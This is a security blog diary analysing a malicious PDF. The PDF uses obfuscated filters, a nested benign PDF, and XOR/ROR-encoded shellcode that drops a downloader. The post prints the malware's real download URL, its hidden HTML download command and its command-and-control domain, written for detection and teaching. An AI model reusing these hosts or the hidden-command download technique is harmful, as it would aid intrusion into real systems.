My next class:
Web App Penetration Testing and Ethical HackingAmsterdamMar 31st - Apr 5th 2025

PDF Babushka

Published: 2010-01-14. Last Updated: 2010-01-14 09:13:48 UTC
by Bojan Zdrnja (Version: 1)
3 comment(s)

I'm pretty sure that some of our readers had enough of malicious PDF for last couple of weeks. Adobe finally patched the last outstanding vulnerability yesterday (although the automatic installation process on my laptop horribly failed) and on the same day we had a very concerning announcement by Google.

It appears that the initial attack vector on Google (and 20+ other companies!) was probably a malicious PDF document. Judging by attack dates posted by Google (middle of December), it was maybe even the very latest vulnerability. We already posted several diaries about such malicious PDF documents last week – see my diary at http://isc.sans.org/diary.html?storyid=7867 or Daniel's static analysis diaries at http://isc.sans.org/diary.html?storyid=7903 and http://isc.sans.org/diary.html?storyid=7906 (with some of Daniel's great perl fu).

Couple of days ago we received another malicious PDF from our reader Richard. Initially we thought that it's JAOP (Just Another Obfuscated PDF), which it, at the bottom line, is, but it turned out to be much more. So, in this diary I will go through this malicious PDF document (and I promise not to bug you with PDFs any more, unless it's something really interesting). The document I analyzed has MD5 of 12aab3743c6726452eb0a91d8190a473 and the original document name was Us-J-India_strategic_dialogue.pdf.

First thing to check when analyzing such malicious documents is if they contain JavaScript. As mentioned before, Didier's PDF Tools are very handy here. Pdf-parser.py can find JavaScript automatically and in this document it was in object 6. Pdf-parser.py will display the following info for object 6:

obj 6 0
 Type:
 Referencing:
 Contains stream
 [(2, '<<'), (2, '/#4ce#6e#67th'), (1, ' '), (3, '2108'), (2, '/Fi#6c#74#65#72'), (2, '['),
(2, '/#46#6c#61#74#65#44ec#6f#64e'), (2, '/A#53CI#49Hex#44#65cod#65'), (2, ']'), (2, '>>'), (1, 'rn')]

 <<
   /Length 2108
   /Filter [
   /FlateDecode /ASCIIHexDecode]
 >>


obj 6 0
 Type:
 Referencing:
 Contains stream
 [(2, '<<'), (2, '/Length'), (1, ' '), (3, '1336'), (2, '/Filter'), (2, '/FlateDecode'), (2, '>>')]

 <<
   /Length 1336
   /Filter /FlateDecode
 >>


That's a bit weird – looks like there are two object 6 in the document, both first generation (trailing 0, obj 6 0). The first one looks pretty weird too – I highlighted the original filter descriptions, notice how obfuscated they are (#NN is hexadecimal ASCII value that can be interspersed with normal text in PDFs). Also, notice that the first object uses two filters: FlateDecode and ASCIIHexDecode. More about the second object below.

Now pdf-parser.py will not automatically unpack this correctly. Depending on the version of pdf-parser.py, it might even only pick the second object since Didier added support for ASCIIHexDecode later, so make sure you have the latest version of pdf-parser.py. My version prints something like this:

$ pdf-parser.py --object 6 --raw --filter Us-J-India_strategic_dialogue.pdf
obj 6 0
 Type:
 Referencing:
 Contains stream
 <</#4ce#6e#67th 2108/Fi#6c#74#65#72[/#46#6c#61#74#65#44ec#6f#64e/A#53CI#49Hex#44#65cod#65]>>


 <<
   /#4ce#6e#67th 2108
   /Fi#6c#74#65#72 [
   /#46#6c#61#74#65#44ec#6f#64e /A#53CI#49Hex#44#65cod#65]
 >>

 <</#4ce#6e#67th 2108/Fi#6c#74#65#72[/#46#6c#61#74#65#44ec#6f#64e/A#53CI#49Hex#44#65cod#65]>>
Stream
<binary blob>
Endstream

obj 6 0
 Type:
 Referencing:
 Contains stream
 <</Length 1336/Filter/FlateDecode>>

 <<
   /Length 1336

We can see that pdf-parser.py printed both objects, but only unpacked the second. In other words, we have to uncompress the first object ourselves. That's relatively easy to do – we can take the binary blob, apply deflate to it (zlib.decompress) and then just ASCII hex decode it.

After unpacking the stream we can finally see obfuscated JavaScript. It tries to exploit two vulnerabilities, util.printd and the latest doc.media.newPlayer vulnerability. In both cases it executes the supplied shell code, which contains more interesting stuff. The shell code is Unicode encoded and, by some coincidence, it even looks like Chinese characters. However, thanks to @binjo and @iamyeh from Twitter I know it's junk ?.

The shell code itself is XORed with 0x67 which makes it easy to find even if you extract it directly from the PDF document by using some of analysis techniques documented by Daniel in his diaries. However, the second stage binary is encoded differently. In order to figure that out I had to debug the shell code. After some tracing it turned out that the second stage binary is (of course) embedded in the PDF document. However, it's not XORed, as is the case typically with such embedding but instead it is RORed! The following code shows the deobfuscation part:

0040121C   > 8DB40D 0002000>LEA ESI,DWORD PTR SS:[EBP+ECX+200]
00401223   . AC             LODS BYTE PTR DS:[ESI]
00401224   . 32C1           XOR AL,CL
00401226   . C0C8 03        ROR AL,3
00401229   . 87FA           XCHG EDX,EDI
0040122B   . 8DBC0D 0002000>LEA EDI,DWORD PTR SS:[EBP+ECX+200]
00401232   . AA             STOS BYTE PTR ES:[EDI]

Why did the attacker do this? Well, maybe no special reason, but maybe he's reading our diaries and noticed how Daniel user XORSearch to find embedded binaries (maybe the AV vendors do something similar). This way he made sure that using utilities such as XORSearch will not find the embedded binary.

Besides the 2nd stage binary, there is another thing embedded in the PDF document: another PDF document (hence the diary name PDF Babushka – see this Wikipedia entry if you don't know what a Babushka is). The original shell code that gets executed by the exploit, after starting the 2nd stage binary extracts this second PDF document (which is benign) and uses Adobe Reader to display it. So, similarly to the PDF document I analyzed last week, this one shows a benign PDF document as well, but this time it directly calls Adobe to open it (that previous document dropped another binary). This also explains why pdf-parser.py sees two object 6 – the second one belongs to the second, embedded PDF document. Amazing how much garbage Adobe Reader can eat and ignore.

Back to the second stage binary. This binary is a downloader with some interesting functions. The downloader connects to hxxp://at.epac [dot] to/album/index.htm. This page looks benign, but the first line of the HTML source shows something interesting:

<!-- DOCHTMLhttp://at.epac.to/image/UPDATE.CAB -->

It's a hidden downloader command. While analyzing the downloader I noticed that it also checks for other two keywords: Tuichu and Xiumau – no idea what these are (maybe author's names/handles?).

So, finally, the UPDATE.CAB file drops another executable that injects a DLL into Internet Explorer. This DLL tries to connect to for.toh.info, on port 443 (SSL) but when I tested it the port was closed (or my IP address was filtered – I just got a RST packet back).

And this ends our journey through this malicious PDF document. Regarding AV detection, it is still far away from perfect and shows how we must not rely *only* on AV. The PDF document is detected by only 8 out of 41 AV scanners on VT (here), the second stage dropper is detected by 11/41 (here) and the downloaded UPDATE.CAB file is detected by 8/41 again (here). Sad, isn't it.

--
Bojan
INFIGO IS

3 comment(s)
My next class:
Web App Penetration Testing and Ethical HackingAmsterdamMar 31st - Apr 5th 2025

Comments

Looks to me like this PDF was specifically designed to fool pdf-parser.py.
XORSearch supports ROL (1 thru 7) and ROT (1 thru 25). Didn't add ROR support, as ROR can be done with ROL. Like ROR-1 is equivalent with ROL-7 for one byte.

And I've a new XORSearch with support for Unicde that I'll publish in the coming weeks.
Actually, we need more pointers on detection of malicious PDF. The PDF format is anything but passe, and promises to be a vehicle of choice for black hats since so many people across industry and defense sectors employ PDF.

Adobe deserves a vote of no-confidence for keeping known holes open far too long. Shades of Microsoft complacency, aka "Monopoly is never having to say you are sorry."

Why should we use PDF if it invites security problems?

Your presentation was fairly easy to understand, and that is a tribute to you.

Diary Archives